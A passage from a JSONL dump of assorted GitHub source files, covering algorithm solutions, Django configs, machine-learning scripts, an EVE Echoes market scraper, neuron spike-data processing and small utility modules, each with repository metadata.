bcnt:\n ans = min(ans, rcnt)\n elif rcnt > bcnt:\n ans = min(ans, bcnt)\n return ans\n\nprint(sol())","repo_name":"mintropy/algorithm_pulzo","sub_path":"지현배/2110/1008/17615.py","file_name":"17615.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"40148398344","text":"from django.contrib import admin\n\nfrom .models import Event, Option\n\n\nclass OptionInline(admin.TabularInline):\n model = Option\n readonly_fields = (\"id\", \"created_at\")\n\n\n@admin.register(Event)\nclass EventAdmin(admin.ModelAdmin):\n readonly_fields = (\"id\", \"created_at\", \"updated_at\")\n inlines = (OptionInline,)\n fieldsets = (\n (\n None,\n {\n \"fields\": (\n readonly_fields,\n \"owner\",\n \"title\",\n \"description\",\n \"timezone\",\n \"optional\",\n ),\n },\n ),\n )\n add_fieldsets = (\n (\n None,\n {\n \"classes\": (\"wide\",),\n \"fields\": (\n \"owner\",\n \"title\",\n \"description\",\n \"timezone\",\n \"optional\",\n ),\n },\n ),\n )\n list_display = (\"title\", \"owner\", \"timezone\", \"optional\")\n ordering = (\"title\", \"owner\")\n search_fields = (\"title\", \"description\")\n","repo_name":"mehdy/K","sub_path":"event/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34724239215","text":"# *******************************\n# * Author: Doug Smyka *\n# * Application: Inventory *\n# * Date Created: 10.6.2020 *\n# * Date Revised: 10.7.2020 *\n# *******************************\n\n# Function for adding a new item to the inventory\ndef add_new_item(info):\n global inventory\n inventory[info[0]] = {'Quantity': info[1], 'Price': info[2], 'Description': info[3]}\n\n\n# Function for getting information from user\ndef new_item():\n global itemList\n print('item: ', end='')\n v1 = input().lower()\n itemList.append(v1)\n print('Quantity: ', end='')\n v2 = input().lower()\n print('Price: ', end='')\n v3 = input().lower()\n print('Description: ', end='')\n v4 = input().lower()\n add_new_item([v1, v2, v3, v4])\n\n\n# Function for asking user if they would like to add an item\ndef ask_user():\n add_item = True\n while add_item is True:\n print('Would you like to add an item? ', end='')\n user_response = input().lower()\n if user_response == 'yes' or user_response == 'y':\n new_item()\n else:\n add_item = False\n\n# Function to search for an item\ndef item_search():\n global inventory\n print('Please enter the item you are searching for: ', end='')\n user_response = input().lower()\n if user_response in inventory:\n print('Quantity: %(Quantity)s Price: %(Price)s Description: %(Description)s' % (inventory[user_response]))\n else:\n print('Item not in inventory')\n\n\n# Function to ask user if they want to search for an item\ndef ask_search():\n search = True\n while search is True:\n print('Would you like to search for an item in the inventory? 
', end='')\n user_response = input().lower()\n if user_response == 'yes' or user_response == 'y':\n item_search()\n else:\n search = False\n\n\n# Function for printing table\ndef print_table():\n global inventory\n global itemList\n j = 0\n print('\\n******************* Inventory **********************\\n')\n for i in inventory:\n item = itemList[j]\n j += 1\n print('[%s] ' % item, end='')\n print('Quantity: %(Quantity)s Price: %(Price)s Description: %(Description)s' % (inventory[i]))\n print('\\n********************************************************\\n')\n\n\n# Function for main\ndef main():\n ask_user()\n ask_search()\n print_table()\n\n\n# Initialization\ninventory = {}\nitemList = []\n\n# Main\nmain()\n\n# EOF\n","repo_name":"smykad/inventory","sub_path":"inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5325990666","text":"from Connect4Game import Connect4Game\nfrom tensorflow.keras import optimizers\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Activation, Dropout\nimport numpy as np\nimport os\n\nclass DeepC4Agent():\n input_length = Connect4Game.ROW_COUNT * Connect4Game.COLUMN_COUNT * 3\n\n def __init__(self, name, load_models):\n self.name = name\n self.main_weights_file = \"models/{0}_main_weights.h5\".format(self.name)\n self.target_weights_file = \"models/{0}_target_weights.h5\".format(self.name)\n self.main_network = QNetwork(input_length = self.input_length)\n self.target_network = QNetwork(input_length = self.input_length)\n # Make the networks equal\n self.update_target_network(1)\n if load_models:\n self.load_weights_from_files()\n\n def update_target_network(self, tau):\n updated_weights = (np.array(self.main_network.model.get_weights()) * tau) + (np.array(self.target_network.model.get_weights()) * (1 - tau))\n self.target_network.model.set_weights(updated_weights)\n\n def load_weights_from_files(self):\n if os.path.exists(self.main_weights_file):\n print(\"Loading main weights\")\n self.main_network.model.load_weights(self.main_weights_file)\n if os.path.exists(self.target_weights_file):\n print(\"Loading target weights\")\n self.target_network.model.load_weights(self.target_weights_file)\n\n def save_model_weights(self):\n self.target_network.model.save_weights(self.target_weights_file)\n self.main_network.model.save_weights(self.main_weights_file)\n\nclass QNetwork():\n def __init__(self, input_length):\n self.model = Sequential()\n self.model.add(Dense(512, input_dim=input_length, activation='relu', name='fc1', use_bias=False))\n self.model.add(Dense(2048, activation='relu', name='fc2', use_bias=False))\n self.model.add(Dense(1024, activation='relu', name='fc3', use_bias=False))\n self.model.add(Dense(128, activation='relu', name='fc4', use_bias=False))\n self.model.add(Dense(Connect4Game.COLUMN_COUNT, name='fc5', use_bias=False))\n sgd = optimizers.SGD(lr=0.001)\n self.model.compile(loss='mse', optimizer=sgd, metrics=['mae'])","repo_name":"Ellebaek/c4champion","sub_path":"DeepC4Agent_keras_double.py","file_name":"DeepC4Agent_keras_double.py","file_ext":"py","file_size_in_byte":2279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73630688693","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n \n # 2 
layer DFS [O(n2), 36%]\n def pathSum(self, root: TreeNode, sum: int) -> int:\n if not root:\n return 0\n count = [0]\n self.dfs(root, sum, count)\n return count[0]\n \n def dfs(self, root, sum, count):\n if not root:\n return \n ###print(\"dfs:\", root.val)\n \n self.sumDown(root, sum-root.val, count)\n # self.sumDown(root.left, sum-root.val, count)\n # self.sumDown(root.right, sum-root.val, count)\n \n self.dfs(root.left, sum, count)\n self.dfs(root.right, sum, count) \n \n def sumDown(self, root, sum, count):\n if not root:\n return \n ###print(\" sumDown:\", root.val, sum)\n \n #if not root.left and not root.right: #NO, we don't only count until reaching the leaves \n if sum == 0:\n count[0] += 1\n \n if root.left:\n self.sumDown(root.left, sum-root.left.val, count)\n if root.right:\n self.sumDown(root.right, sum-root.right.val, count)\n \n \n ","repo_name":"ianlai/Note-Python","sub_path":"algo/tree/_0437_PathSum3.py","file_name":"_0437_PathSum3.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36689445702","text":"import pandas as pd\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom sklearn.decomposition import PCA\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nwine = pd.read_csv('https://archive.ics.uci.edu/ml/'\r\n 'machine-learning-databases/wine/wine.data',\r\n header=None)\r\nX, y = wine.iloc[:, 1:].values, wine.iloc[:, 0].values\r\n# print(np.unique(y))\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, stratify=y, random_state=0)\r\nSC = StandardScaler()\r\nX_train_std = SC.fit_transform(X_train)\r\nX_test_std = SC.transform(X_test)\r\npca = PCA()\r\nX_train_pca = pca.fit_transform(X_train_std)\r\nvar_exp = pca.explained_variance_ratio_\r\n\r\n\r\ndef plot_var_exp(var_exp):\r\n cum_var_exp = np.cumsum(var_exp)\r\n plt.figure()\r\n plt.bar(range(1, 14), var_exp, alpha=0.5, align='center', label='individual explained variance')\r\n plt.step(range(1, 14), cum_var_exp, where='mid', label='cumulative explained variance')\r\n plt.ylabel('Explained variance ratio')\r\n plt.xlabel('Principal component index')\r\n plt.legend(loc='best')\r\n plt.tight_layout()\r\n plt.show()\r\n\r\n\r\nplot_var_exp(var_exp)\r\n\r\n\r\ndef plot_scatter(c1, c2, y):\r\n plt.figure()\r\n plt.scatter(c1[y == 3], c2[y == 3], color='red')\r\n plt.scatter(c1[y == 1], c2[y == 1], color='blue')\r\n plt.scatter(c1[y == 2], c2[y == 2], color='green')\r\n plt.legend(loc='best')\r\n plt.tight_layout()\r\n plt.show()\r\n\r\n\r\nplot_scatter(X_train_pca[:, 0], X_train_pca[:, 1], y_train)\r\n\r\npca = PCA(n_components=2)\r\nX_train_pca = pca.fit_transform(X_train_std)\r\nX_test_pca = pca.transform(X_test_std)\r\n\r\nlr = LogisticRegression()\r\nlr = lr.fit(X_train_pca, y_train)\r\n\r\nfrom matplotlib.colors import ListedColormap\r\n\r\n\r\ndef plot_decision_regions(X, y, classifier, resolution=0.02):\r\n # setup marker generator and color map\r\n markers = ('s', 'x', 'o', '^', 'v')\r\n colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\r\n cmap = ListedColormap(colors[:len(np.unique(y))])\r\n\r\n # plot the decision surface\r\n x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\r\n x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\r\n xx1, xx2 = 
np.meshgrid(np.arange(x1_min, x1_max, resolution),\r\n np.arange(x2_min, x2_max, resolution))\r\n Z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\r\n Z = Z.reshape(xx1.shape)\r\n plt.contourf(xx1, xx2, Z, alpha=0.4, cmap=cmap)\r\n plt.xlim(xx1.min(), xx1.max())\r\n plt.ylim(xx2.min(), xx2.max())\r\n\r\n # plot class samples\r\n for idx, cl in enumerate(np.unique(y)):\r\n plt.scatter(x=X[y == cl, 0],\r\n y=X[y == cl, 1],\r\n alpha=0.6,\r\n c=cmap(idx),\r\n edgecolor='black',\r\n marker=markers[idx],\r\n label=cl)\r\n plt.xlabel('x1')\r\n plt.ylabel('x2')\r\n plt.legend(loc='lower left')\r\n plt.tight_layout()\r\n # plt.savefig('images.png', dpi=300)\r\n plt.show()\r\n\r\n\r\nplot_decision_regions(X_train_pca, y_train, classifier=lr)\r\n\r\nplot_decision_regions(X_test_pca, y_test, classifier=lr)\r\n\r\n# below code shows how we use LDA to reduce dimension and build a LR classifier\r\nlda = LDA(n_components=2)\r\nX_train_lda = lda.fit_transform(X_train_std, y_train)\r\nlr = LogisticRegression()\r\nlr = lr.fit(X_train_lda, y_train)\r\nX_test_lda = lda.transform(X_test_std)\r\nplot_decision_regions(X_train_lda, y_train, classifier=lr)\r\nplot_decision_regions(X_test_lda, y_test, classifier=lr)","repo_name":"Qinghua88/machine-learning","sub_path":"PCA_LDA_linear.py","file_name":"PCA_LDA_linear.py","file_ext":"py","file_size_in_byte":3697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2591288066","text":"s = input()\r\nt = input()\r\nfinal = \"\"\r\nisS = True\r\nnum = 0\r\nfor i in range(len(s)):\r\n if s[i] == t[i]:\r\n final += s[i]\r\n else:\r\n num += 1\r\n if isS:\r\n final += s[i]\r\n isS = False\r\n else:\r\n final += t[i]\r\n isS = True\r\nif num % 2 == 0:\r\n print(final)\r\nelse:\r\n print(\"impossible\")","repo_name":"strcoder4007/codeforces","sub_path":"545-B/545-B-11176632.py","file_name":"545-B-11176632.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"1529157707","text":"import argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nimport numpy as np\n\nclass Generator(nn.Module):\n def __init__(self, ngf=32):\n super(Generator, self).__init__()\n # input is 3 x 32 x 128 x 128 (duplicated by 3 x 1 x 128 x 128)\n\n self.downConv1 = nn.Conv3d(5, ngf,(3, 4, 4), stride=(1, 2, 2), padding=(1, 1, 1),bias=False)\n self.downConv2 = nn.Conv3d(ngf, ngf *2 ,(4, 4, 4), stride=(2, 2, 2), padding=(1, 1, 1),bias=False)\n self.downConv3 = nn.Conv3d(ngf *2, ngf * 4, 4, 2, 1, bias=False)\n self.downConv4 = nn.Conv3d(ngf * 4, ngf * 8, 4, 2, 1, bias=False)\n self.downConv5 = nn.Conv3d(ngf * 8, ngf * 16, 4, 2, 1, bias=False)\n self.downConv6 = nn.Conv3d(ngf * 16, ngf * 16, (2, 4, 4), stride=(1, 1, 1), padding=(0, 0, 0), bias=False)\n\n # get\n self.downBN2 = nn.BatchNorm3d(ngf * 2)\n self.downBN3 = nn.BatchNorm3d(ngf * 4)\n self.downBN4 = nn.BatchNorm3d(ngf * 8)\n self.downBN5 = nn.BatchNorm3d(ngf * 16)\n self.relu = nn.ReLU(inplace = True)\n\n self.upConv1 = nn.ConvTranspose3d(ngf * 16, ngf * 16, (2,4,4), stride=(1, 1, 1), padding=(0, 0, 0), bias=False )\n self.upConv2 = nn.ConvTranspose3d(ngf * 16, ngf * 8, 4, 2, 1, bias=False)\n self.upConv3 = nn.ConvTranspose3d(ngf * 
8, ngf * 4, 4, 2, 1, bias=False)\n self.upConv4 = nn.ConvTranspose3d(ngf * 4, ngf * 2, 4, 2, 1, bias=False)\n self.upConv5 = nn.ConvTranspose3d(ngf * 2, ngf * 1, (4,4,4), stride=(2, 2, 2), padding=(1, 1, 1), bias=False)\n self.upConv6 = nn.ConvTranspose3d(ngf * 1, 3, (3,4,4), stride=(1, 2, 2), padding=(1, 1, 1), bias=False)\n\n\n self.upBN1 = nn.BatchNorm3d(ngf * 16)\n self.upBN2 = nn.BatchNorm3d(ngf * 8)\n self.upBN3 = nn.BatchNorm3d(ngf * 4)\n self.upBN4 = nn.BatchNorm3d(ngf * 2)\n self.upBN5 = nn.BatchNorm3d(ngf * 1)\n\n self.tanh = nn.Tanh()\n self.lrelu = nn.LeakyReLU(0.2, inplace=True)\n\n def forward(self, x):\n downx1 = self.downConv1(x)\n downx2 = self.downConv2(downx1)\n downx2 = self.downBN2(downx2)\n downx2 = self.lrelu(downx2)\n downx3 = self.downConv3(downx2)\n downx3 = self.downBN3(downx3)\n downx3 = self.lrelu(downx3)\n downx4 = self.downConv4(downx3)\n downx4 = self.downBN4(downx4)\n downx4 = self.lrelu(downx4)\n downx5 = self.downConv5(downx4)\n downx5 = self.downBN5(downx5)\n downx5 = self.lrelu(downx5)\n downx6 = self.downConv6(downx5)\n\n upx1 = self.upConv1(downx6)\n upx1 = self.upBN1(upx1)\n upx1 = self.relu(upx1)\n upx1 = downx5 + upx1\n\n upx2 = self.upConv2(upx1)\n upx2 = self.upBN2(upx2)\n upx2 = self.relu(upx2)\n upx2 = downx4 + upx2\n\n upx3 = self.upConv3(upx2)\n upx3 = self.upBN3(upx3)\n upx3 = self.relu(upx3)\n upx3 = downx3 + upx3\n\n upx4 = self.upConv4(upx3)\n upx4 = self.upBN4(upx4)\n upx4 = self.relu(upx4)\n upx4 = downx2 + upx4\n\n upx5 = self.upConv5(upx4)\n upx5 = self.upBN5(upx5)\n upx5 = self.relu(upx5)\n upx5 = downx1 + upx5\n\n upx6 = self.upConv6(upx5)\n upx6 = self.tanh(upx6)\n\n return upx6\n\nclass Discriminator(nn.Module):\n def __init__(self, ndf=32):\n super(Discriminator, self).__init__()\n self.main = nn.Sequential(\n # input is 3 x 32 x 256 x 256\n nn.Conv3d(5, ndf,(3, 4, 4), stride=(1, 2, 2), padding=(1, 1, 1),bias=False),\n nn.LeakyReLU(0.2, inplace=True),\n # ndf x 32 x 64 x 64\n nn.Conv3d(ndf, ndf *2 ,(4, 4, 4), stride=(2, 2, 2), padding=(1, 1, 1),bias=False),\n nn.BatchNorm3d(ndf * 2),\n nn.LeakyReLU(0.2, inplace=True),\n # (ndf*2) x 16 x 32 x 32\n nn.Conv3d(ndf *2, ndf * 4, 4, 2, 1, bias=False),\n nn.BatchNorm3d(ndf * 4),\n nn.LeakyReLU(0.2, inplace=True),\n # (ndf*4) x 8 x 16 x 16\n nn.Conv3d(ndf * 4, ndf * 8, 4, 2, 1, bias=False),\n nn.BatchNorm3d(ndf * 8),\n nn.LeakyReLU(0.2, inplace=True),\n # (ndf*8) x 4 x 8 x 8\n nn.Conv3d(ndf * 8, ndf * 16, 4, 2, 1, bias=False),\n nn.BatchNorm3d(ndf * 16),\n nn.LeakyReLU(inplace=True),\n # (ndf*16) x 2 x 4 x 4\n nn.Conv3d(ndf * 16, 1, (2, 4, 4), stride=(1, 1, 1), padding=(0, 0, 0), bias=False),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n return self.main(x)\n","repo_name":"kult0922/Animating-Cloud-Images-with-Flow-Style-Transfer","sub_path":"models/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"37029970115","text":"import sqlite3\nfrom io import StringIO\nimport json\n\nimport csv\n\nimport time\n\nimport pandas as pd\nimport requests\n\n\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64)'}\n\n# Any URL that gives a .cvs file should work with the below function\neve_echoes_market_url = 'https://api.eve-echoes-market.com/market-stats/stats.csv'\n\nitem_url = 'https://api.eve-echoes-market.com/market-stats/'\n\n\n# Provide a URL that gives a .csv file and the name of the table in your database to add it to.\ndef download_csv(url, 
database_table_name):\n\n # Opens the database connection with the given database name. if the name is not found it will make one\n database_connection = sqlite3.connect('EE_Historical_Market.db')\n\n # Downloads the raw text of the given url - Not sure if this is the way your supposed to do this\n csv_text = requests.get(url, headers=headers).text\n\n # Converts the string into a pandas data table - again not sure if you should do this but it works\n df = pd.read_csv(StringIO(csv_text), sep=\",\")\n\n # Save the file to a csv file using pandas - could probly just save the file instead of converting then saving\n df.to_csv(f'{database_table_name}.csv')\n\n with database_connection:\n # Use pandas to add the cvs file to the database table and if it exists replace it\n # you can also use 'append' to just add it to the table\n df.to_sql(database_table_name, database_connection, if_exists='replace')\n\n database_connection.close()\n\n\ndownload_csv(eve_echoes_market_url, 'EVE ECHOES MARKET')\n\n#TODO Comment all this stuff\n\ndef get_item_data(database_connection, item_name, item_id):\n print(item_name)\n\n item_enteries = requests.get(f'{item_url}{item_id}', headers=headers).text\n\n data = json.loads(item_enteries)\n\n data_df = pd.json_normalize(data)\n\n with database_connection:\n # Use pandas to add the cvs file to the database table and if it exists replace it\n # you can also use 'append' to just add it to the table\n data_df.to_sql(item_name, database_connection, if_exists='append')\n\n remove_duplicates(database_connection, item_name)\n\ndef update_all_items():\n\n start_time = time.time()\n\n database_connection = sqlite3.connect('EE_Historical_Market.db')\n\n csv_text = requests.get(eve_echoes_market_url, headers=headers).text\n\n df = pd.read_csv(StringIO(csv_text), sep=\",\")\n\n csv_file = open('Market Data Lookup.csv')\n\n csv_dict = csv.DictReader(csv_file)\n\n lookup_dict = {}\n\n for row in csv_dict:\n lookup_dict[int(row['ID'])] = {'main_category': row['Main Category'], 'sub_category': row['Sub Category']}\n\n csv_file.close()\n \n for index, row in df.iterrows():\n\n item_id = df.at[index, 'item_id']\n name_str = df.at[index, 'name'].replace(' ', '_').replace(\"'\", '').replace('-', '_').replace(':', '')\n item_name = name_str.replace('.', '').replace('(', '_').replace(')', '')\n\n get_item_data(database_connection, item_name, item_id)\n\n try:\n\n category = lookup_dict[item_id]['main_category']\n\n if category == 'Manufacturing Materials' or category == 'Pilot Service':\n\n get_csv_from_database(database_connection, item_name)\n\n print(item_name)\n\n except KeyError as e:\n print(f'Couldnt find id {e}')\n\n with database_connection:\n # Use pandas to add the cvs file to the database table and if it exists replace it\n # you can also use 'append' to just add it to the table\n df.to_sql('TABLE_NAME', database_connection, if_exists='replace')\n\n database_connection.close()\n\n finish_time = time.time()\n\n total_time = finish_time - start_time\n\n print(f'Finished all items in {total_time}seconds or {total_time/60}min')\n\n\n\ndef remove_duplicates(database_connection, table_name):\n \n cursor = database_connection.cursor()\n \n query = f'DELETE FROM {table_name} WHERE rowid NOT IN (SELECT min(rowid) FROM {table_name} GROUP BY time)'\n \n cursor.execute(query)\n\n\n\ndef get_csv_from_database(database_connection, table_name):\n\n query = f'SELECT * FROM {table_name}'\n\n df = pd.read_sql_query(query, database_connection)\n\n df.to_csv(f'csv_files/{table_name}.csv')\n\n 
try:\n\n df.to_csv(f'/var/www/html/csv_files/{table_name}.csv')\n\n except FileNotFoundError as e:\n print(e)\n\n\n\nlast_run = 0\n\nwhile True:\n if time.time() - last_run >= 86400:\n update_all_items()\n last_run = time.time()\n \n else:\n time.sleep(1)\n","repo_name":"shilerhobbs/WebScrapePractice","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34832202373","text":"from typing import Tuple\n\nfrom django.contrib.auth.models import User\nfrom esi.models import Token\n\nfrom allianceauth.authentication.models import CharacterOwnership\nfrom allianceauth.eveonline.models import EveCharacter, EveCorporationInfo\nfrom allianceauth.tests.auth_utils import AuthUtils\nfrom app_utils.testing import add_new_token\n\nfrom ..models import Owner\n\n\ndef create_owner(character_id, corporation_id):\n _, character_ownership = create_user_from_evecharacter(character_id)\n corp = (\n EveCorporationInfo.objects.get(corporation_id=corporation_id)\n if corporation_id\n else None\n )\n return Owner.objects.create(character=character_ownership, corporation=corp)\n\n\ndef create_user_from_evecharacter(character_id: int) -> Tuple[User, CharacterOwnership]:\n auth_character = EveCharacter.objects.get(character_id=character_id)\n user = AuthUtils.create_user(auth_character.character_name)\n user = AuthUtils.add_permission_to_user_by_name(\"blueprints.basic_access\", user)\n user = AuthUtils.add_permission_to_user_by_name(\n \"blueprints.add_corporate_blueprint_owner\", user\n )\n user = AuthUtils.add_permission_to_user_by_name(\n \"blueprints.add_personal_blueprint_owner\", user\n )\n user = AuthUtils.add_permission_to_user_by_name(\"blueprints.manage_requests\", user)\n character_ownership = add_character_to_user(\n user,\n auth_character,\n is_main=True,\n scopes=[\n \"esi-assets.read_assets.v1\",\n \"esi-assets.read_corporation_assets.v1\",\n \"esi-characters.read_blueprints.v1\",\n \"esi-corporations.read_blueprints.v1\",\n \"esi-industry.read_character_jobs.v1\",\n \"esi-industry.read_corporation_jobs.v1\",\n \"esi-universe.read_structures.v1\",\n ],\n )\n return user, character_ownership\n\n\ndef add_character_to_user(\n user: User,\n character: EveCharacter,\n is_main: bool = False,\n scopes: list = None,\n) -> CharacterOwnership:\n if not scopes:\n scopes = \"publicData\"\n\n token = add_new_token(user, character, scopes)\n token.save()\n if is_main:\n user.profile.main_character = character\n user.profile.save()\n user.save()\n\n return CharacterOwnership.objects.get(user=user, character=character)\n\n\ndef scope_names_set(token: Token) -> set:\n return set(token.scopes.values_list(\"name\", flat=True))\n","repo_name":"staropera/aa-blueprints","sub_path":"blueprints/tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25851788183","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon May 27 15:23:56 2019\n\n@author: Antoine\n\"\"\"\n\n#%% import this first and set the repository to the PCA_monkey project\n\nfrom scipy.io import loadmat\nimport os\nimport pandas as pd\nimport glob\nimport numpy as np\n\n\ndef extract(x):\n \"\"\"returns the spikes of a given dataframe row in a convenient way. 
The\n data are originally encoded as strings in the files.\n ---\n Return \n \n An array containing the spike times as floats64\n \"\"\"\n x = x.split(sep=\", \")\n x[0] = x[0][1:]\n x[-1] = x[-1][:-1]\n \n return np.array(x, dtype=np.float64)\n\n#%% extracting files from matlab encoding\n\nglobal_path = \"data/\"\n\nfor macaque in glob.glob(global_path + \"/r*\"):\n \n path_to_glob = os.path.join(macaque, \"prefront\", \"r*.mat\")\n \n for file_name in glob.glob(path_to_glob):\n data = loadmat(file_name)[\"result\"]\n \n #f1 extraction\n f1 = []\n for trial in range(1, len(data)):\n f1.append(data[trial,3][0,0])\n \n #trial extraction\n trials = []\n for trial in range(1, len(data)):\n trials.append(data[trial,1][0,0])\n \n #spikes extraction\n spikes = []\n for trial in range(1, len(data)):\n temp = []\n for measure in range(data[trial,5].shape[1]):\n for time in data[trial,5][0,measure][0]:\n temp.append(time)\n temp.sort()\n spikes.append(temp)\n\n\n clean = pd.DataFrame({\"trial\":trials, \"f1\":f1, \"spikes\":spikes})\n clean.to_csv(\"C:/Users/Antoi/pca_monkey/clean_data/\" + \n file_name[-14:-4] + \".txt\")\n \n\n#%% aggregating the repetitive files to have only 1 file per neuron\n \npath = \"clean_data/\"\n\nfor file_name in glob.glob(path+ \"R*\"):\n \n #taking the neuron name -1 string to check if multiple files for 1 neuron\n neuron_name = file_name[-14:-5] \n path_to_glob = os.path.join(path, neuron_name+\"?.txt\")\n \n if len(glob.glob(path_to_glob))>1 and file_name[-5]==\"1\":\n file_list = glob.glob(path_to_glob)\n data = pd.read_csv(file_list[0], index_col=0)\n \n #just taking the other files to concatenate them\n for file in file_list[1:]:\n temp = pd.read_csv(file)\n data = pd.concat((data, temp), ignore_index=True)\n os.remove(file)\n \n os.remove(file_name)\n data.to_csv(file_list[0][:-8]+\".txt\")\n\n#changing names of remaining files \nfor file_name in glob.glob(path+ \"R*_001.txt\"):\n neuron_name = file_name[-14:-8]\n destination = os.path.join(\"clean_data/\", neuron_name+\".txt\")\n source = os.path.join(\"clean_data/\", file_name[-14:])\n os.rename(source, destination)\n\n#%% transforming the time data into spike counts for each neuron\n\nold_path = \"clean_data/\"\nnew_path = \"count_data/\"\n\nfrequencies = [10, 14, 18, 24,30,34] \nbin_size = 500\nmax_length = 10000\nbins = [[i*bin_size, (i+1)*bin_size] for i in range(int(max_length/bin_size))]\n\nfor file_name in glob.glob(old_path+ \"R*\"):\n data = pd.read_csv(file_name, index_col=0)\n \n #checking if all frequencies are tested\n ok = True\n for freq in frequencies:\n if freq not in data.f1.unique():\n ok = False\n \n if ok:\n new = {\"f1\":[], \"count\":[]}\n \n for freq in frequencies:\n new[\"f1\"].append(freq)\n temp = data[data.f1==freq]\n temp = temp.reset_index()\n \n all_spikes = np.empty((0))\n for trial in range(len(temp)):\n all_spikes = np.concatenate((all_spikes,extract(temp.at[trial,\"spikes\"])))\n \n count = np.zeros(len(bins))\n for time in all_spikes:\n for index, ith_bin in enumerate(bins):\n if ith_bin[0]/', views.delete, name='delete'),\n path('entry/', views.entry, name='entry'),\n path('/', views.read),\n]","repo_name":"bramz/thoth","sub_path":"entries/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"12342142639","text":"def veoh_download(url, output_dir = '.', merge = False, info_only = False, **kwargs):\n '''Get item_id'''\n if 
re.match(r'http://www.veoh.com/watch/\\w+', url):\n        item_id = match1(url, r'http://www.veoh.com/watch/(\\w+)')\n    elif re.match(r'http://www.veoh.com/m/watch.php\\?v=\\.*', url):\n        item_id = match1(url, r'http://www.veoh.com/m/watch.php\\?v=(\\w+)')\n    else:\n        raise NotImplementedError('Cannot find item ID')\n    # forward the caller-supplied output_dir and merge instead of hardcoding them\n    veoh_download_by_id(item_id, output_dir = output_dir, merge = merge, info_only = info_only, **kwargs)\n\n","repo_name":"YangsenChen/Prompt4SE","sub_path":"milestone1/visualization/python/pythonCode/veohDl.py","file_name":"veohDl.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} {"seq_id":"15424839682","text":"from bmcmanager.commands.base import BMCManagerServerCommand, BMCManagerServerGetCommand\n\n\nclass Get(BMCManagerServerGetCommand):\n    \"\"\"\n    print server RAM\n    \"\"\"\n\n    oob_method = \"system_ram\"\n\n\nclass Check(BMCManagerServerCommand):\n    \"\"\"\n    check server RAM [Nagios]\n    \"\"\"\n\n    oob_method = \"check_ram\"\n\n    def get_parser(self, prog_name):\n        parser = super().get_parser(prog_name)\n        parser.add_argument(\n            \"--expected\",\n            type=int,\n            default=None,\n            help=\"GB of RAM the server should have\",\n        )\n        return parser\n","repo_name":"grnet/BMCManager","sub_path":"bmcmanager/commands/ram.py","file_name":"ram.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} {"seq_id":"23503407425","text":"\r\n# Tools for managing the building of quick lookup tables\r\n\r\nimport MySQLdb\r\nimport sys, string\r\nimport Config\r\n\r\nclass Quick( ) :\r\n\r\n\tdef __init__( self, db, cursor ) :\r\n\t\tself.db = db\r\n\t\tself.cursor = cursor\r\n\t\tself.goDefs = self.fetchGODefinitionHash( )\r\n\t\tself.goEvidence = self.fetchGOEvidenceHash( )\r\n\t\t\r\n\tdef fetchOrganismHash( self ) :\r\n\t\t\r\n\t\tself.cursor.execute( \"SELECT * FROM \" + Config.DB_QUICK + \".quick_organisms\" )\r\n\t\t\r\n\t\torganismHash = { }\r\n\t\tfor row in self.cursor.fetchall( ) :\r\n\t\t\torganismHash[str(row[0])] = row\r\n\t\t\t\r\n\t\treturn organismHash\r\n\t\t\r\n\tdef fetchUniprotOrganismHash( self ) :\r\n\t\t\r\n\t\tself.cursor.execute( \"SELECT * FROM \" + Config.DB_QUICK + \".quick_uniprot_organisms\" )\r\n\t\t\r\n\t\torganismHash = { 